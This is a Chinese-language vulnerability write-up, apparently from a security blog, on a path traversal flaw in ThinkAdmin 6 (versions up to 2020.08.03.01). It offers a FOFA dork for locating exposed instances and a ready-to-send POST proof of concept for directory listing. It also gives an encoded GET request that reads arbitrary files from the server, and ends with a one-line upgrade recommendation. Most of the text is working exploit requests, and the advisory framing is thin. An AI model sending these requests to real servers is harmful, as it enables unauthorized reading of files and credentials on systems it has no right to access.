漏洞信息:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

影响范围:

Thinkadmin版本小于 ≤ 2020.08.03.01

漏洞复现:

fofa_dork: “ThinkAdmin” && title”系统登录 · ThinkAdmin”

POC:

POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

rules=%5B%22.%2F%22%5D 
```![](https://www.bylibrary.cn/wp-content/uploads/2020/09/微信图片_20200921085600.jpg) 获取版本信息:```
https://xxxxx/admin.html?s=admin/api.Update/version 
```2、⽂件读取,后⾯那⼀串是UTF8字符串加密后的结果。计算⽅式在Update.php中的加密函数。 /admin.html? s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34 [![](https://www.bylibrary.cn/wp-content/uploads/2020/09/wp_editor_md_502ae6ea9426ef92a5791175b16de552.jpg)](https://www.bylibrary.cn/wp-content/uploads/2020/09/wp_editor_md_502ae6ea9426ef92a5791175b16de552.jpg)

#### 修复方案:

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本